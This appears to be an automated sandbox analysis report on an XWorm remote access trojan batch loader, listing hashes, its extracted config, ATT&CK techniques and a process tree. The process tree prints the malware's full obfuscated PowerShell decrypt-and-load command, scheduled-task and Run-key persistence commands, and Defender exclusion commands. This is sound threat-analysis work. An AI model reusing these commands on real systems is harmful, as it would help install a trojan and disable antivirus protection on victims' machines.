xworm | 34f1b41e2547cf79b54e6b174f7b9b2be3f918fa52e831606f58de55513df91e

Resubmissions

01/05/2024, 16:07

240501-tkvthsaf91 10

01/05/2024, 16:06

240501-tkcmyaaf9t 10

Analysis

max time kernel
148s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
01/05/2024, 16:06

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

loader-upd.bat
Size

295KB
MD5

e0b1638feea307a3afbeacaec7fd506c
SHA1

16d849c8f90412a612e1fc0eed6e406f076d4099
SHA256

34f1b41e2547cf79b54e6b174f7b9b2be3f918fa52e831606f58de55513df91e
SHA512

795e2418636e320eb8cd381066ac5ef4ef479b770d1bab1a7221aba15d7fa9e7d54b996dac1b93fa9068e57c5ee369fd5024ce916c6de07e48f1ff8d51863a5e
SSDEEP

6144:yll7goJPFab7YvftLMYUQK4UHF8WkA0dXTwxl:MlnabilLMYHbTDlSl

Score

10^/10

xworm persistence rat trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%Public%
install_file
svchost.exe
pastebin_url
https://pastebin.com/raw/UWpQULMP

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/3524-50-0x0000015F7E8F0000-0x0000015F7E908000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
25	3524	powershell.exe
27	3524	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
400	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Public\\svchost.exe"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	pastebin.com
25	pastebin.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4996	schtasks.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3524	powershell.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

pid	Process
3296	powershell.exe
3296	powershell.exe
3504	powershell.exe
3504	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
2424	powershell.exe
2424	powershell.exe
2424	powershell.exe
4712	powershell.exe
4712	powershell.exe
4712	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
4740	powershell.exe
4740	powershell.exe
4740	powershell.exe
3524	powershell.exe
400	svchost.exe
400	svchost.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3296	powershell.exe
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeIncreaseQuotaPrivilege	3504	powershell.exe
Token: SeSecurityPrivilege	3504	powershell.exe
Token: SeTakeOwnershipPrivilege	3504	powershell.exe
Token: SeLoadDriverPrivilege	3504	powershell.exe
Token: SeSystemProfilePrivilege	3504	powershell.exe
Token: SeSystemtimePrivilege	3504	powershell.exe
Token: SeProfSingleProcessPrivilege	3504	powershell.exe
Token: SeIncBasePriorityPrivilege	3504	powershell.exe
Token: SeCreatePagefilePrivilege	3504	powershell.exe
Token: SeBackupPrivilege	3504	powershell.exe
Token: SeRestorePrivilege	3504	powershell.exe
Token: SeShutdownPrivilege	3504	powershell.exe
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeSystemEnvironmentPrivilege	3504	powershell.exe
Token: SeRemoteShutdownPrivilege	3504	powershell.exe
Token: SeUndockPrivilege	3504	powershell.exe
Token: SeManageVolumePrivilege	3504	powershell.exe
Token: 33	3504	powershell.exe
Token: 34	3504	powershell.exe
Token: 35	3504	powershell.exe
Token: 36	3504	powershell.exe
Token: SeIncreaseQuotaPrivilege	3504	powershell.exe
Token: SeSecurityPrivilege	3504	powershell.exe
Token: SeTakeOwnershipPrivilege	3504	powershell.exe
Token: SeLoadDriverPrivilege	3504	powershell.exe
Token: SeSystemProfilePrivilege	3504	powershell.exe
Token: SeSystemtimePrivilege	3504	powershell.exe
Token: SeProfSingleProcessPrivilege	3504	powershell.exe
Token: SeIncBasePriorityPrivilege	3504	powershell.exe
Token: SeCreatePagefilePrivilege	3504	powershell.exe
Token: SeBackupPrivilege	3504	powershell.exe
Token: SeRestorePrivilege	3504	powershell.exe
Token: SeShutdownPrivilege	3504	powershell.exe
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeSystemEnvironmentPrivilege	3504	powershell.exe
Token: SeRemoteShutdownPrivilege	3504	powershell.exe
Token: SeUndockPrivilege	3504	powershell.exe
Token: SeManageVolumePrivilege	3504	powershell.exe
Token: 33	3504	powershell.exe
Token: 34	3504	powershell.exe
Token: 35	3504	powershell.exe
Token: 36	3504	powershell.exe
Token: SeIncreaseQuotaPrivilege	3504	powershell.exe
Token: SeSecurityPrivilege	3504	powershell.exe
Token: SeTakeOwnershipPrivilege	3504	powershell.exe
Token: SeLoadDriverPrivilege	3504	powershell.exe
Token: SeSystemProfilePrivilege	3504	powershell.exe
Token: SeSystemtimePrivilege	3504	powershell.exe
Token: SeProfSingleProcessPrivilege	3504	powershell.exe
Token: SeIncBasePriorityPrivilege	3504	powershell.exe
Token: SeCreatePagefilePrivilege	3504	powershell.exe
Token: SeBackupPrivilege	3504	powershell.exe
Token: SeRestorePrivilege	3504	powershell.exe
Token: SeShutdownPrivilege	3504	powershell.exe
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeSystemEnvironmentPrivilege	3504	powershell.exe
Token: SeRemoteShutdownPrivilege	3504	powershell.exe
Token: SeUndockPrivilege	3504	powershell.exe
Token: SeManageVolumePrivilege	3504	powershell.exe
Token: 33	3504	powershell.exe
Token: 34	3504	powershell.exe
Token: 35	3504	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3524	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 3484 wrote to memory of 4792	3484	cmd.exe	85
PID 3484 wrote to memory of 4792	3484	cmd.exe	85
PID 4792 wrote to memory of 3956	4792	net.exe	86
PID 4792 wrote to memory of 3956	4792	net.exe	86
PID 3484 wrote to memory of 3296	3484	cmd.exe	88
PID 3484 wrote to memory of 3296	3484	cmd.exe	88
PID 3296 wrote to memory of 3504	3296	powershell.exe	91
PID 3296 wrote to memory of 3504	3296	powershell.exe	91
PID 3296 wrote to memory of 1808	3296	powershell.exe	93
PID 3296 wrote to memory of 1808	3296	powershell.exe	93
PID 1808 wrote to memory of 4780	1808	WScript.exe	94
PID 1808 wrote to memory of 4780	1808	WScript.exe	94
PID 4780 wrote to memory of 1840	4780	cmd.exe	96
PID 4780 wrote to memory of 1840	4780	cmd.exe	96
PID 1840 wrote to memory of 640	1840	net.exe	97
PID 1840 wrote to memory of 640	1840	net.exe	97
PID 4780 wrote to memory of 3524	4780	cmd.exe	102
PID 4780 wrote to memory of 3524	4780	cmd.exe	102
PID 3524 wrote to memory of 2424	3524	powershell.exe	107
PID 3524 wrote to memory of 2424	3524	powershell.exe	107
PID 3524 wrote to memory of 4712	3524	powershell.exe	109
PID 3524 wrote to memory of 4712	3524	powershell.exe	109
PID 3524 wrote to memory of 5000	3524	powershell.exe	111
PID 3524 wrote to memory of 5000	3524	powershell.exe	111
PID 3524 wrote to memory of 4740	3524	powershell.exe	113
PID 3524 wrote to memory of 4740	3524	powershell.exe	113
PID 3524 wrote to memory of 4996	3524	powershell.exe	115
PID 3524 wrote to memory of 4996	3524	powershell.exe	115

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\loader-upd.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3484
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:3956
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lzFVt/XZ9GDXtrgfp7KUrq1Ztc2rugzPUj8aolktWds='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('46ZcKkyMoGeI1RQ/MLZr7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xeoYe=New-Object System.IO.MemoryStream(,$param_var); $XWMDy=New-Object System.IO.MemoryStream; $zsdvE=New-Object System.IO.Compression.GZipStream($xeoYe, [IO.Compression.CompressionMode]::Decompress); $zsdvE.CopyTo($XWMDy); $zsdvE.Dispose(); $xeoYe.Dispose(); $XWMDy.Dispose(); $XWMDy.ToArray();}function execute_function($param_var,$param2_var){ $GDMaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pxsZU=$GDMaA.EntryPoint; $pxsZU.Invoke($null, $param2_var);}$IKYhk = 'C:\Users\Admin\AppData\Local\Temp\loader-upd.bat';$host.UI.RawUI.WindowTitle = $IKYhk;$qTuZc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IKYhk).Split([Environment]::NewLine);foreach ($GpwKA in $qTuZc) { if ($GpwKA.StartsWith(':: ')) { $FTfzC=$GpwKA.Substring(3); break; }}$payloads_var=[string[]]$FTfzC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_828_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_828.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3504
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_828.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_828.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4780
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1840
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:640
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lzFVt/XZ9GDXtrgfp7KUrq1Ztc2rugzPUj8aolktWds='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('46ZcKkyMoGeI1RQ/MLZr7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xeoYe=New-Object System.IO.MemoryStream(,$param_var); $XWMDy=New-Object System.IO.MemoryStream; $zsdvE=New-Object System.IO.Compression.GZipStream($xeoYe, [IO.Compression.CompressionMode]::Decompress); $zsdvE.CopyTo($XWMDy); $zsdvE.Dispose(); $xeoYe.Dispose(); $XWMDy.Dispose(); $XWMDy.ToArray();}function execute_function($param_var,$param2_var){ $GDMaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pxsZU=$GDMaA.EntryPoint; $pxsZU.Invoke($null, $param2_var);}$IKYhk = 'C:\Users\Admin\AppData\Roaming\startup_str_828.bat';$host.UI.RawUI.WindowTitle = $IKYhk;$qTuZc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IKYhk).Split([Environment]::NewLine);foreach ($GpwKA in $qTuZc) { if ($GpwKA.StartsWith(':: ')) { $FTfzC=$GpwKA.Substring(3); break; }}$payloads_var=[string[]]$FTfzC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Adds Run key to start application
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3524
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2424
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4712
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\svchost.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5000
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4740
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:4996

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4696

C:\Users\Public\svchost.exe
C:\Users\Public\svchost.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1cc5e033811a5d520bb4a6904b5c433b

SHA1
c159a342ed372790600b3a6ac97e274638a0ce9a

SHA256
9e20052dd29dfcd8220dcf271acd3e27f9d6b785d72531043741ef349b48c7a8

SHA512
dd8b57e50382a7a84aea3986c3ae8a38ade0fb84a5c9696339487022321be12f08aff9d47455a28137e31a8632cda2490dcf0332c6b3c72e7cfdd10e63e4f429

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
83685d101174171875b4a603a6c2a35c

SHA1
37be24f7c4525e17fa18dbd004186be3a9209017

SHA256
0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870

SHA512
005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cf2b51542e45ce071f6a94e91b86dbbf

SHA1
f697758696e2a26ed48bc367649b978b2335ac3a

SHA256
c4e4f8f3a973583292f8e1573d54b8675133d776ed4b36ac7d6cd1e9c8e288f8

SHA512
ba615503d7856a6cedd9a033ea5f42f294abd9968262b1cd7962889701770d63d40343e2a1259f5090c3eb870b89fd3701f324a76665f0981b6ecac0cee55eb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2oqimngf.xmp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_828.bat

Filesize
295KB

MD5
e0b1638feea307a3afbeacaec7fd506c

SHA1
16d849c8f90412a612e1fc0eed6e406f076d4099

SHA256
34f1b41e2547cf79b54e6b174f7b9b2be3f918fa52e831606f58de55513df91e

SHA512
795e2418636e320eb8cd381066ac5ef4ef479b770d1bab1a7221aba15d7fa9e7d54b996dac1b93fa9068e57c5ee369fd5024ce916c6de07e48f1ff8d51863a5e

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_828.vbs

Filesize
115B

MD5
18e4086a4c0870437876e125d720c827

SHA1
6f984d870e3c7af4583481389ea2c0f186d220fa

SHA256
80085545d24ff829b7aee0ae8310a9e55aec7ae59dad078e574dd885bc6eb549

SHA512
04d96d55e9d4484c8a6a9fa7edab9c0a3ba82ac50ac471a9bdbbd9021e6eb2730e4472ff93aa55a640d25f5979c5d0b91157d35e0cd1b5c2bd8112382ae8522f

Download Submit
C:\Users\Public\svchost.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/400-106-0x000001B9C0A80000-0x000001B9C0AF6000-memory.dmp

Filesize
472KB

Download
memory/400-105-0x000001B9C07B0000-0x000001B9C07F4000-memory.dmp

Filesize
272KB

Download
memory/3296-49-0x00007FFD23260000-0x00007FFD23D21000-memory.dmp

Filesize
10.8MB

Download
memory/3296-0-0x00007FFD23263000-0x00007FFD23265000-memory.dmp

Filesize
8KB

Download
memory/3296-14-0x000002462B200000-0x000002462B23A000-memory.dmp

Filesize
232KB

Download
memory/3296-13-0x000002462B1D0000-0x000002462B1D8000-memory.dmp

Filesize
32KB

Download
memory/3296-12-0x00007FFD23260000-0x00007FFD23D21000-memory.dmp

Filesize
10.8MB

Download
memory/3296-11-0x00007FFD23260000-0x00007FFD23D21000-memory.dmp

Filesize
10.8MB

Download
memory/3296-6-0x000002462AF70000-0x000002462AF92000-memory.dmp

Filesize
136KB

Download
memory/3504-30-0x00007FFD23260000-0x00007FFD23D21000-memory.dmp

Filesize
10.8MB

Download
memory/3504-27-0x00007FFD23260000-0x00007FFD23D21000-memory.dmp

Filesize
10.8MB

Download
memory/3504-26-0x00007FFD23260000-0x00007FFD23D21000-memory.dmp

Filesize
10.8MB

Download
memory/3504-25-0x00007FFD23260000-0x00007FFD23D21000-memory.dmp

Filesize
10.8MB

Download
memory/3524-50-0x0000015F7E8F0000-0x0000015F7E908000-memory.dmp

Filesize
96KB

Download